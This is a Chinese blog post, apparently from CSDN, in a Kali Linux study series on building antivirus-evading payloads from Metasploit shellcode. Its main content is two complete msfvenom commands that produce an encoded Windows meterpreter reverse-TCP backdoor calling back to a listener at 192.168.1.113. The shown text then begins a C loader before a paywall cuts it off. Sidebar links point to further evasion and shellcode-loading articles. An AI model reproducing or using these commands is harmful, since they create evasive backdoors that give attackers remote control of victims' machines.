Kali的学习笔记篇(八)使用msf生成的shellcode制作免杀payload

最新推荐文章于 2024-05-14 08:54:41 发布
最新推荐文章于 2024-05-14 08:54:41 发布
阅读量6.5k 收藏 20
点赞数 7
分类专栏: kali 卡莉咖喱
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34886247/article/details/81613335
版权

环境:

    kali-linux-2018.2-amd.iso  

    Visual Studio 2017

    msfvenom

   更新时间:2018年8月13日07:06:43

直接注入的生成方式(一):

//生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.113 LPORT=55555 -f exe > test.exe

输出c格式的方式(二):

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=192.168.1.113 LPORT=55555 -f c

使用VS2017,将生成的c代码复制到shellcode is here

#include "stdafx.h"
#include "windows.h"
#inc
了解本专栏 订阅专栏 解锁全文 超级会员免费看
红衣学姐
关注
  • 7
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
订阅专栏
使用MSF生成shellcode
weixin_34092455的博客
04-02 1034
使用MSF生成shellcode payloadshellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
4.1 MSF 制作shellcode,且运行
qq_55202378的博客
08-25 3381
msf shellcode
如何进行免杀
最新发布
hakksjss的博客
05-14 706
0x03 免杀思路总结环境准备:火绒(静态)、360、windowsdef(动态) 免杀的最基本思路就是去除其特征,这个特征有可能是特征码,也有可能是行为特征,只要在不修改其 原有功能的情况下,破坏了病毒与木马所固有的特征,一次免杀就能完成。文件免杀
生命在于学习——MSF初体验(三)
易水哲的博客
10-27 1540
MSF笔记记录(三)
MSF-Shellcode生成使用
weixin_34301307的博客
11-12 4689
1使用环境 Kali 2.0 msfvenom 2Msfvenom参数说明 msfvenom –h 查看帮助 说明: Options: -p, --payload <payload>指定需要使用payload(攻击荷载)。如果需要使用自定义的payload,请使用&...
Veil-Ordnance:Veil-Ordnance是一种旨在快速生成MSF Stager Shellcode的工具
05-09
面纱军械 Veil-Ordnance旨在快速生成可用于漏洞利用或有效载荷的shellcode。 在@ christruncer,@ themightyshiv和@ harmj0y之间进行了多次讨论之后,我们得到了灵感。在这些讨论中,我们确定了需要一种生成shellcode的工具,而该工具不会改变我们的输出。 我们决定不依赖第三方来执行此操作,而是决定自己编写。 此工具中的所有有效负载均从Metasploit框架移植。 没有声称是任何有效载荷的原始作者。 在Metasploit项目上工作的出色人士都因在此工具中编写不同的有效负载而受到所有人的称赞。 他们的有效负载只是从Ruby移植到Python。 用法: ./Veil-Ordnance.py -p rev_tcp --ip 192.168.63.149-端口8675 例子: ./Veil-Ordnance.py -p rev_ht
shellCode免杀技巧
qq_39330735的博客
05-15 2281
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
kali学习笔记1.pdf
07-19
笔记记录了详细的从网络扫描,信息收集(被动信息收集技术讲解,主动信息收集(各层协议的主动扫描方法{从网络层到应用层},nmap扫描器的使用全参数讲解),系统漏洞扫描器缓...笔记还有第二章,可以直接搜索kali学习笔记2
Kali msf教程
08-24
kali linux msf系列教程
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
免杀工具--veil-evasion
11-21
安装完成后,你可以使用Veil-Evasion的命令行界面来选择合适的攻击载体和免杀技术,生成payload,并将其部署到目标环境中。 在实际使用过程中,记住,免杀工具虽然在合法的渗透测试中具有重要的价值,但必须遵循...
KALI linux学习记录笔记
05-13
KALI linux学习记录笔记 linux入门的笔记,包括常用命令!
使用shellcode打造MSF免杀payloadshellcode加载技术
jackey3Lin的专栏
10-21 5464
0x00 前言      经常有同学提及MSF payload免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀payload,那就是shellcode。  0x01 从哪里开始      shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode生成功能,接下来我们就拿最常用的payload:reverse
使用msfpayload生成shellcode
11-10 5455
在看0day安全:软件漏洞分析技术的时候需要用到shellcode,照着上面的写个
红队作业 | MSF源码级别免杀实录
Ms08067安全实验室
11-24 1410
文章来源|MS08067 红队培训班 第4期本文作者:学员A(红队培训班4期学员)按老师要求尝试完成布置的作业如下:对于msf生成shellcode都是一样的。所以从代码层面来讲来说,不...
Metasploit & CobaltStrike 的shellcode分析
lacoucou的专栏
07-24 1725
Metasploit & CobaltStrike 生成shellcode beacon
C语言执行shellcode的五种方法
热门推荐
云守护的专栏
05-30 1万+
//C语言执行shellcode的五种方法 #include #include //data段可读写 #pragma comment(linker, "/section:.data,RWE") //不显示窗口 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") #pragma comment
动态加载 ShellCode绕过杀软
weixin_30790841的博客
08-11 2574
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。 虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这文章中,我们将使用...
kali linux之免杀技术
weixin_30690833的博客
03-05 925
恶意软件: 病毒,木马。蠕虫,键盘记录,僵尸程序,流氓软件,勒索软件,广告程序 在用户非自愿的情况下安装 出于某种恶意的目的:控制,窃取,勒索,偷窥,推送,攻击 恶意程序最主要的防护手段:杀软 检测原理:基于二进制文件中特征签名的黑名单检测方法;基于行为的分析方法(启发式) 免杀技术: 修改二进制文件中的特征字符---替换,擦除,修改 加密技术(cry...
如何使用kalimsf制作木马
06-10
我很抱歉,我不能回答如何使用Kali的Metasploit Framework(MSF制作木马的问题,因为这涉及到违法和不道德的行为。MSF是一个用于漏洞测试和渗透测试的工具,但其目的是帮助安全专业人员和网络管理员保护网络安全,而不是破坏网络安全。在任何情况下,不要试图使用Kali或任何其他工具来制作或传播恶意软件,否则你可能会面临法律责任。请遵守相关法规和道德规范,使用工具来促进网络安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值